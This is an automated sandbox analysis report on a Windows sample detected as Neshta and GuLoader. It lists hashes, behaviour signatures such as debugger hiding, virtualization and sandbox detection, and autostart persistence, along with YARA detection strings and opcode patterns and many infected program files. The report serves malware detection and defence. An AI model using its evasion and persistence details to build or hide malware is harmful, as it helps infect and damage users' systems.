Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Z68mMCAxFZ.exe

Overview

General Information

Sample Name:Z68mMCAxFZ.exe
Analysis ID:490869
MD5:547612a9ff746063a74c71b009230500
SHA1:c04b0adc612addc701e3a0336a4e8a23fbd331c4
SHA256:bf99b231b81ab2ba895c0cbf395a5fdb5fc18d3465592150e365f31302c8250a
Tags:exeNeshta
Infos:

Most interesting Screenshot:

Detection

GuLoader Neshta
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Potential malicious icon found
Yara detected Neshta
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Drops PE files with a suspicious file extension
Tries to detect Any.run
Drops executable to a common third party application directory
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Found dropped PE file which has not been started or loaded
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Z68mMCAxFZ.exe (PID: 6284 cmdline: 'C:\Users\user\Desktop\Z68mMCAxFZ.exe' MD5: 547612A9FF746063A74C71B009230500)
    • Z68mMCAxFZ.exe (PID: 6584 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' MD5: 6CE7CC1F376F6BD9D090EAF04EF72DFE)
      • Z68mMCAxFZ.exe (PID: 4488 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' MD5: 6CE7CC1F376F6BD9D090EAF04EF72DFE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Z68mMCAxFZ.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Z68mMCAxFZ.exeJoeSecurity_NeshtaYara detected NeshtaJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
    • 0xa0e7:$x1: the best. Fuck off all the rest.
    • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
    • 0xa108:$s1: Neshta
    • 0xa113:$s2: Made in Belarus.
    • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
    • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
    • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
    C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJoeSecurity_NeshtaYara detected NeshtaJoe Security
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
      • 0xa0e7:$x1: the best. Fuck off all the rest.
      • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
      • 0xa108:$s1: Neshta
      • 0xa113:$s2: Made in Belarus.
      • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
      • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
      • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJoeSecurity_NeshtaYara detected NeshtaJoe Security
        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
        • 0xa0e7:$x1: the best. Fuck off all the rest.
        • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
        • 0xa108:$s1: Neshta
        • 0xa113:$s2: Made in Belarus.
        • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
        • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
        • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
        Click to see the 215 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmpJoeSecurity_NeshtaYara detected NeshtaJoe Security
          0000000F.00000002.938917460.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: Z68mMCAxFZ.exe PID: 6284JoeSecurity_NeshtaYara detected NeshtaJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.Z68mMCAxFZ.exe.400000.0.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
              • 0xa0e7:$x1: the best. Fuck off all the rest.
              • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
              • 0xa108:$s1: Neshta
              • 0xa113:$s2: Made in Belarus.
              • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
              • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
              • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
              0.0.Z68mMCAxFZ.exe.400000.0.unpackJoeSecurity_NeshtaYara detected NeshtaJoe Security
                0.2.Z68mMCAxFZ.exe.400000.0.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
                • 0xa0e7:$x1: the best. Fuck off all the rest.
                • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
                • 0xa108:$s1: Neshta
                • 0xa113:$s2: Made in Belarus.
                • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
                • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
                • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
                0.2.Z68mMCAxFZ.exe.400000.0.unpackJoeSecurity_NeshtaYara detected NeshtaJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: Z68mMCAxFZ.exeVirustotal: Detection: 85%Perma Link
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: Z68mMCAxFZ.exeAvira: detected
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeAvira: detection malicious, Label: W32/Neshta.A
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Neshta.A
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeReversingLabs: Detection: 95%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeReversingLabs: Detection: 95%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeReversingLabs: Detection: 95%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeReversingLabs: Detection: 96%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeReversingLabs: Detection: 96%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeMetadefender: Detection: 91%Perma Link
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeReversingLabs: Detection: 96%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeReversingLabs: Detection: 93%
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeReversingLabs: Detection: 95%
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeReversingLabs: Detection: 96%
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeReversingLabs: Detection: 96%
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeReversingLabs: Detection: 96%
                  Machine Learning detection for sampleShow sources
                  Source: Z68mMCAxFZ.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJoe Sandbox ML: detected
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                  Source: 0.2.Z68mMCAxFZ.exe.400000.0.unpackAvira: Label: W32/Neshta.A
                  Source: 0.0.Z68mMCAxFZ.exe.400000.0.unpackAvira: Label: W32/Neshta.A
                  Source: Z68mMCAxFZ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

                  Spreading:

                  barindex
                  Yara detected NeshtaShow sources
                  Source: Yara matchFile source: Z68mMCAxFZ.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
